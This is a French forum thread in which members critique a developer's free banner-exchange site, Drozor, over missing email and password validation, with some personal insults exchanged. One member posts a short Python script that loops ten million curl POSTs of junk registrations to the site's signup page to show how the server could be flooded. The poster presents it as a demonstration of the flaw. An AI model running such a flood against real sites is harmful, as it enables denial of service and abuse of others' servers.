J'ai pas lu tous les commentaires (merci à ceux qui commentent pour rien dire ou pour se moquer de son projet)
J'étais pas très emballé au départ mais je me suis souvenu qu'à l'époque je faisais des forums sur un fournisseur gratuit et on s'inscrivait sur d'autres forums du même thème pour s'échanger des bannières en 88x31 qu'on affichait chacun sur nos forums respectifs.
J'espère que ton projet fonctionnera bien, en tout cas, pour ceux qui n'ont pas d'argent pour se référencer, ceux qui démarrent leur site web ton projet peut devenir intéressant. Quand j'aurai fini mon site je m'inscrirai sur Drozor le temps d'avoir un minimum de visiteurs par mois.
Pour revenir à mon message, mon but n'était pas de créer la discorde. Je voulais simplement attirer l'attention sur le fait que si tu ne vérifies pas l'adresse e-mail ou qu'un mot de passe peu recherché soit pris en compte, ce n'est pas très professionnel et sécurisant, et par conséquent peu rassurant pour un utilisateur.
J'ai déjà dit plein de trucs utiles, soit que t'es pas assez intelligent pour comprendre, soit que t'es tellement de mauvaise foi que tu veux pas de l'admettre. Ou un peu des deux, c'est possible aussi x)
Remarque, c'est pas la première fois que c'est évoqué ton caractère :
> - Aze n'est pas ambitieux, il est ignorant et borné. Et totalement irrespectueux dans sa manière de ne rien écouter de ce qu'on lui dit.
Drgalino : peut être que tu a déjà dit des trucs utiles au projet. Mais en tout cas tes derniers messages c'est vraiment pas ça. Soit tu poste des trucs vraiment utiles, soit tu clic sur le bouton "Arrêtez de suivre ce sujet".
EDIT : Dominus Carnufex a le mérite d'avoir compris lui
A l'heure actuelle il est possible de totalement pourrir ton serveur en quelques lignes de code...
#!/usr/bin/python3
import subprocess
url = "https://drozor.com/inscript.php"
for i in range(0, 10000000):
x = str(i)
data = "pseudo=" + x + "&mail=" + x + "&mdp=" + x + "&verif=" + x
subprocess.call(["curl", "--data", data, url], stdout=subprocess.DEVNULL)
Les avertissements des membres sur la sécurité ne sont pas là pour t'emmerder Aze.
Et le mot de passe, il faut qu'il corresponde à la 2e verification, ou ca aussi c'est optionnel, et si on rentre 2 password différents ca passe ?
Tu te rends compte que c'est n'importe quoi, et qu'en plus tu refuses d'ecouter les avis des autres, avec la fameuse technique des enfants de 12 ans "LALALA j'ecoute pas !"
Il y a 2 messages de cela je t'ai dit que la vidéo était moche. Et surtout ce "schéma". Que sur une régie publicitaire, c'est inadmissible, vous êtes dans le secteur de la communication, votre site doit être convaincant. Là ça montre juste une certaine incompétence.
C'était direct mais ça sous entendait "puisque c'est moche, faut faire quelque chose pour que ça devienne meilleur".
Visiblement puisque j'ai employé le mot "moche" tu as pris ça pour de l'inutile, mais j'ai juste plus le courage d'expliquer ça sur 10 lignes comme je l'aurai fait avant.
@Globorg : t'a essayé de rentrer deux mot de passes différents ?
@Drgalino : tu a dit que la vidéo étaient moche. J'avais bien compris le sens "puisque c'est moche, faut faire quelque chose pour que ça devienne meilleur". J'ai déjà dit avant que je suis une brêle en animation, et je t'ai répondu après qu'il n'y avait que lui qui avait proposé. Je n'ai pas pris ça pour de l'inutile, je t'ai répondu^^
Je ne fais que montrer comment exploiter la faille remontée hier par Rednax. Le mec dont tu t'es moqué parce qu'il te conseillait de vérifier les emails.
car la vérification du format email, je la ferais en javascript sur la page inscription.php, au vue de ce qu'il me demande. (bien que ce soit passable^^).
Et pour bloquer ton script il m'a suffit de faire un gettype sur le POST
car la vérification du format email, je la ferais en javascript sur la page inscription.php, au vue de ce qu'il me demande. (bien que ce soit passable^^).
Première leçon du développement d'applications web : ne jamais faire confiance aux données arrivant sur le serveur.
Mais c'est good, fais ton traitement en javascript, c'est une très bonne initiative
Si tu attend que quelqu'un te ponde un code qui peut pourrir ton serveur pour corriger des erreurs, tu va avoir des problèmes.
Si j'ai bien compris en plus y'a des histoires de rémunération derrière, c'est d'autant plus dangereux. Prie pour que ton site ne devienne pas assez connue pour que les pirates s'y intéresse un peu.
Sinon, pourquoi pas une version en anglais? Le peu de mots affichés sont facilement traduisible je pense
Par curiosité, quel type de BD utilise tu?
- Edité par R_T_F_M 31 juillet 2015 à 11:49:43
Je fais des erreurs, j'ai pas la science infuse. Mais généralement, j'ai lu le putain de manuel
Et pour bloquer ton script il m'a suffit de faire un gettype sur le POST
Je pense que tu as mal compris l'intention de ce script - c'est 7 lignes de code et encore moins de minutes de travail, je n'ai évidemment pas cherché à le rendre intelligent ni même à le lancer.
Quelqu'un qui s'y met vraiment peut mettre ton site hors ligne en quelques heures et tu as l'air de ne pas en prendre conscience.
vu que toute les variables sont de type string normalement, ça bloque le script au début si c'est pas le cas (ça limite donc fortement la charge serveur)
@R_T_F_M :
y'a aucune rémunération derrière
la traduction c'est sur la To-Do list, mais c'est un peu bas dedans pour le moment ;).
Développeur passionné, amoureux des maths et créateur de Poker Toolkit, un logiciel pour définir ses ranges au poker.
Mon projet: SpotRoom. N'hésites pas à passer dire ce que tu en penses !